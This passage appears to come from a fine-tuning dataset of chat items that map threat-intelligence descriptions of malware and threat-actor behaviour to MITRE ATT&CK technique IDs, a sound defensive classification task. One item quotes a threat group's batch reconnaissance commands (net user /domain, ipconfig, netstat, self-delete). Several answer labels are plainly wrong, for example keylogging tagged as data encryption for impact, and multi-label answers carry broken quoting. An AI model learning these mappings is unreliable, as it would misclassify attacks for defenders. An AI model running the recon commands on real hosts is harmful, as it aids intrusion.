wiper into the process. Finally, it resumes the process and transfers the execution flow to the fourth-stage wiper. Creates InstallUtil.exe process" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has obfuscated malware and malicious scripts to help avoid detection." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Key Points PrivateLoader is a downloader malware family that was first identified in early 2021 The loader’s primary purpose is to download and execute additional malware as part of a pay-per-install (PPI) malware distribution service PrivateLoader is used by multiple threat actors to distribute ransomware, information stealers, banking t" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSInfo discovers information about the infected machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has used \"sslip.io\", a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can spawn remote shells." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use HTTP or SMTP for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059 - Command and Scripting Interpreter', 'T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperStack can enumerate all account names on a remote share." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We observed the threat group issue the following commands: @echo off   dir c:\\ >> %temp%\\download   ipconfig /all >> %temp%\\download   net user >> %temp%\\download   net user /domain >> %temp%\\download   ver >> %temp%\\download   del %0   @echo off   dir \"c:\\Documents and Settings\" >> %temp%\\download   dir \"c:\\Program Files\\   \" >> %temp%\\download   net start >> %temp%\\download   net localgroup administrator >> %temp%\\download   netstat -ano >> %temp%\\download These commands allow the threat group to gain information about the compromised computer and the network to which it belongs" }, { "role": "assistant", "content": "T1007 - System Service Discovery', 'T1105 - Ingress Tool Transfer', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash uses HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUPERNOVA contained Base64-encoded strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can extract clipboard data from a compromised host." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used password spraying attacks to obtain valid credentials." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax has used scheduled tasks to maintain persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant uses fake TLS to communicate with the C2 server." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current users Run registry key" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The presence of this credential stealer may partially answer how Kobalos propagates. Anyone using the SSH client of a compromised machine will have their credentials captured. Those credentials can then be used by the attackers to install Kobalos on the newly discovered server later" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access." }, { "role": "assistant", "content": "T1534 - Internal Spearphishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldenSpy can execute remote commands in the Windows command shell using the \"WinExec()\" API." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX has a module to enumerate network shares." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can AES encrypt C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM can harvest cookies and upload them to the C2 server." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used MSbuild to execute an actor-created file." }, { "role": "assistant", "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates over common ports such as TCP 80, 443, and 25." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HALFBAKED can use WMI queries to gather system information." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can decrypt its C2 address upon execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX — A remote access tool notable for communications that may contain HTTP headers starting with \"X-\" (e.g. X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Final1stspy obtains victim Microsoft Windows version information and CPU architecture." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware gathers the Address Resolution Protocol (ARP) table from the victim." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can use `wmic` to gather information from a system." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can collect the IP address and NetBIOS name of an infected machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Confucius has exfiltrated victim data to cloud storage service accounts." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OceanSalt can collect the computer name from the system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PyDCrypt has used netsh to find RPC connections on remote machines." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captures keystrokes and sends them back to the C2 server." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel malware can collect a list of running processes on a system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has relied on victims clicking on a malicious link delivered via email." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom binary protocol to beacon back to its C2 server. It has also used XOR for encrypting communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis" }, { "role": "assistant", "content": "T1055.003 - Thread Execution Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, the payload injects into iexplore.exe process and starts encrypting text files and documents of the victim machine" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type runs tests to determine the privilege level of the compromised user." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Otherwise, it runs a search for the “/bin/rsyncd” string within the files found in the /etc/ folder" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can exfiltrate data to the C2 server in 27-character chunks." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received/transmitted one by one or in multiple packets in a single TCP data segment (streamed" }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowGoop has disguised a PowerShell script as a .dat file (goopdate.dat)." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot establishes persistence in the Startup folder." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has executed commands via scheduled tasks." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. " }, { "role": "assistant", "content": "T1584.002 - DNS Server', 'T1583.002 - DNS Server', 'T1496 - Resource Hijacking', 'T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has targeted victims with remote administration tools including RDP." }, { "role": "assistant", "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The binary will be saved in the %APPDATA% folder and, for persistence, it creates a scheduled task that will execute every hour" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can enumerate services on compromised hosts." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Windows specifies a path to store files scheduled for exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can send victim data via FTP with credentials hardcoded in the script." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has collected files from various information repositories." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has conducted brute force password spray attacks." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PDB Path: C:\\Users\\803\\Desktop\\ytyboth\\yty 2.0\\Release\\vstservice.pdb The vstservice.exe plugin is .NET file responsible for sending a list of the file system to the C2. The malware retrieves the C2 from a Google Docs file like the previous binaries. The file was located at the following location" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may enumerate user directories on a victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2022–01–15, MSTIC (Microsoft Threat Intelligence Center) identified and unveiled a cyberattack targeting Ukrainian organizations with “WhisperGate” overwrites Master Boot Record(MBR) and files" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BadPatch captures screenshots in .jpg format and then exfiltrates them." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peirates can use stolen service account tokens to perform its operations." }, { "role": "assistant", "content": "T1078.004 - Valid Accounts: Cloud Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this version, the communication protocol with the C&C server was also upgraded to use AES encryption" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches for files created within a certain timeframe and whose file extension matches a predefined list." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX uses Pastebin to store C2 addresses." }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has the ability to decode downloaded files prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BACKSPACE is capable of enumerating and making modifications to an infected system's Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Olympic Destroyer uses the API call \"ChangeServiceConfigW\" to disable all services on the affected system." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Thread Name Description Key logger Logs key strokes for configured processes and sends them to the command and control (C2) server Form grabber Monitors HTTP traffic for form data and sends it to the C2 server POS monitor Monitors for changes to logs stored in C:\\NSB\\Coalition\\Logs and nsb.pos.client.log and sends parsed data to the C2 server PST monitor Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server HTTP proxy monitor Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1090 - Proxy', 'T1041 - Exfiltration Over C2 Channel', 'T1132 - Data Encoding', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has used the Windows API to make detection more difficult." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline." }, { "role": "assistant", "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Helminth executable variant is able to run batch scripts provided by the C2 server, which is very similar to the script version of this Trojan. The executable variant has one additional capability that is not present in the script version, which involves the ability to log keystrokes via a supplemental keylogger module" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1115 - Clipboard Data', 'T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has obtained and customized publicly-available tools like Mimikatz." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can use mutual TLS and RSA cryptography to exchange a session key." }, { "role": "assistant", "content": "T1573.002 - Asymmetric 